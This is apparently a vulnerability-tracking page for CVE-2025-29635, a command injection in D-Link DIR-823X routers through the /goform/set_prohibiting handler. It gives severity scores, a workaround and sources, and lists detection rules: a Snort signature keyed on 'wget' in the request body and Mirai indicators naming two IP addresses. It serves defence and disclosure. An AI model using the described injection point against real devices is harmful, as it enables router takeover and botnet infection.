ThreatLevelBeta
Planned Fix

CVE-2025-29635

Command Injection in D-Link DIR-823X
Loading...

Summary

The vulnerability affects the D-Link DIR-823X router’s web management interface, specifically the /goform/set_prohibiting CGI handler. A crafted POST request can inject shell metacharacters into a field that is later passed into a system() call, leading to arbitrary command execution on the device. Public proof-of-concept code exists, and Akamai reported active exploitation in the wild that installs Mirai-style malware.

Why Planned Fix?

5/6
Authentication required
Mixed internet / internal deployment
No user interaction needed
Exploitable in default configuration
Active exploitation in the wild
High impact vulnerability

Exploitation Details

Type
Command Injection
Is exploitable with default configuration?
Yes
Is authentication needed?
Yes
PoC / Exploit
Yes
gist.github.com
Impact

Execute arbitrary commands on the router as administrator/root

Full System Compromise
Exploitation Requirements
  • Authentication required
Exploitation Process

An attacker sends a crafted HTTP POST request to /goform/set_prohibiting and places shell metacharacters or command-chain content in the vulnerable form field. The router’s request parser copies that input into a command string and invokes it through system(), so the attacker’s payload runs on the device. In observed attacks, the command chain downloads a shell script and uses it to deploy Mirai malware.

Detection Resources
Manual Detection
0
Script Detection
0
Scanner Detection
0

Affected Software

Vendor:D-Link
ProductAffected Versions
DIR-823X AX3000 Dual-Band Gigabit Wireless Routerfirmware 240126 and 240802
Description

A consumer/SMB wireless router that provides wired and wireless network access plus web-based administration.

Deployment:Mixed (internet/internal)
|
Protocol:HTTP
|
Ports:80
Affected ComponentWeb management CGI handler for the set_prohibiting function, where user-supplied form data is passed into a system command.

Web management CGI handler for the set_prohibiting function, where user-supplied form data is passed into a system command.

Affected Endpoints(3)/goform/set_prohibiting, /goform/login…
1./goform/set_prohibiting
2./goform/login
3./login.html
Enterprise UsageEstimated likelihood that this vendor/product is deployed in enterprise environments. AI-generated estimation based on market presence, product type and adoption signals — not exact data.
Very Low
Low
Medium
High
Very High
Vendor Size:Medium
Vendor Notifications
Not available
Remediation
Workaround
Retire and replace DIR-823X devices; if temporary use is unavoidable, restrict access to the web admin interface to trusted networks and limit exposure of the router management plane.

Retire and replace DIR-823X devices; if temporary use is unavoidable, restrict access to the web admin interface to trusted networks and limit exposure of the router management plane.

supportannouncement.us.dlink.com
Patch

Not available

Update

Not available

Threat Intelligence
EPSS Score1.3%

Probability of exploitation in the next 30 days

EPSS Percentile79%

Worse than 79% of all CVEs

Last updated: Loading...
CISAKEV
CISA KEV
Listed
Loading...
Active Exploitation
Active
akamai.com
Threat Actors

No known threat actors

Detection Rules2
Snort
alert http any any -> $HOME_NET any (msg:"CVE-2025-29635 D-Link DIR-823X command injection"; http_method; content:"POST"; http_uri; content:"/goform/set_prohibiting"; http_client_body; content:"wget"; sid:2963535; rev:1;)
Yara
Mirai_Malware_IOCs_1: detect samples with "segmentation fault (core dumped)", "AI.NEEDS.TO.DIE", 88.214.20.14, or 64.89.161.130

NVD Data

Published: Loading...Modified: Loading...

Description Summary

A command injection vulnerability in D-Link DIR-823X 240126 and 240802 allows an authorized attacker to execute arbitrary commands on remote devices by sending a POST request to /goform/set_prohibiting via the corresponding function, triggering remote command execution.

CVSS Base Score

7.2
High

CVSS Vector (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)

Attack Vector (AV)
Physical
Local
Adjacent
Network
Attack Complexity (AC)
High
Low
Privileges Required (PR)
High
Low
None
User Interaction (UI)
Required
None
Scope (S)
Unchanged
Changed
Confidentiality (C)
None
Low
High
Integrity (I)
None
Low
High
Availability (A)
None
Low
High
CWE:CWE-77 Command Injection
|
NVD:CVE-2025-29635
|
Version From:
|
Version Upto:

Affected Software (CPE) (2)

  • cpe:2.3:o:dlink:dir-823x_firmware:240126:*:*:*:*:*:*:*
  • cpe:2.3:o:dlink:dir-823x_firmware:240802:*:*:*:*:*:*:*

Sources

5
SourceArticle
nvd.nist.govCVE-2025-29635 Detail
www.akamai.comCVE-2025-29635: Mirai Campaign Targets D-Link Devices
supportannouncement.us.dlink.comDIR-823X End-of-Life Notice
gist.github.comDIR-823X Remote Command Execution PoC
www.cisa.govKnown Exploited Vulnerabilities Catalog

Priority History

Fix SoonLoading...

Initial analysis

Planned FixLoading...

Reassessed to Planned Fix

Emergency FixLoading...

Elevated — all critical conditions met

Planned FixLoading...

Reassessed to Planned Fix